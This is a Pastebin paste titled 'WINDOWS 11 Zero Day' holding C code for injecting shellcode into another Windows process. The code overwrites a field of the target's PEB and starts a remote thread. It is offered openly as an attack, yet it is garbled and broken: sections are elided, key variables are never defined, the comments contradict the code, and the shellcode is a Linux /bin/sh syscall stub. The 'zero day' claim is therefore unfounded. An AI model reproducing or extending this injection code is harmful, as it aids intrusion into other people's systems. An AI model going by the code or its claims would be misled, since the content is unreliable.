Advertisement
Sweetening

WINDOWS 11 Zero Day

Apr 8th, 2024
51
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
  1. #include <windows.h>
  2. #include <stdio.h>
  3. #include <tlhelp32.h>
  4. #include <winternl.h> // For PEB
  5.  
  6. #pragma comment(lib, "ntdll.lib")
  7. #pragma comment(lib, "kernel32.lib")
  8.  
  9. const char* shellcode =
  10. "\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e"
  11. "\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05";
  12.  
  13. BOOL InjectShellCode(DWORD pid, const char* moduleName, const char* functionSymbol) {
  14. // ... (previous code)
  15.  
  16. // Modify the atom table of the ntdll.dll module in the target process
  17. PEB peb = { 0 };
  18. if (!ReadProcessMemory(hProcess, pPebAddress, &peb, sizeof(peb), NULL)) {
  19. printf("Failed to read the PEB of the target process (error: %d)\n", GetLastError());
  20. CloseHandle(hProcess);
  21. VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
  22. return FALSE;
  23. }
  24.  
  25. // Replace the atom table of the target process
  26. peb.GdiSharedHandleTable = (ULONG_PTR)pRemoteShellcode;
  27.  
  28. if (!WriteProcessMemory(hProcess, pPebAddress, &peb, sizeof(peb), NULL)) {
  29. printf("Failed to modify the PEB of the target process (error: %d)\n", GetLastError());
  30. CloseHandle(hProcess);
  31. VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
  32. return FALSE;
  33. }
  34.  
  35. // Create a thread in the target process to execute the shellcode
  36. HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunction, NULL, 0, NULL);
  37. if (hThread == NULL) {
  38. printf("Failed to create remote thread in the target process (error: %d)\n", GetLastError());
  39. CloseHandle(hProcess);
  40. VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
  41. return FALSE;
  42. }
  43.  
  44. // Wait for the thread to finish
  45. WaitForSingleObject(hThread, INFINITE);
  46.  
  47. // Clean up
  48. CloseHandle(hThread);
  49. CloseHandle(hProcess);
  50. VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
  51.  
  52. return TRUE;
  53. }
  54.  
  55. int main() {
  56. DWORD targetPID = ...; // The target process PID
  57. const char* moduleName = "..."; // Module name
  58. const char* functionSymbol = "..."; // Function symbol
  59.  
  60. // ... (previous code)
  61.  
  62. BOOL success = InjectShellCode(targetPID, moduleName, functionSymbol);
  63. if (success) {
  64. printf("Shellcode injection successful!\n");
  65. } else {
  66. printf("Shellcode injection failed!\n");
  67. }
  68.  
  69. return 0;
  70. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement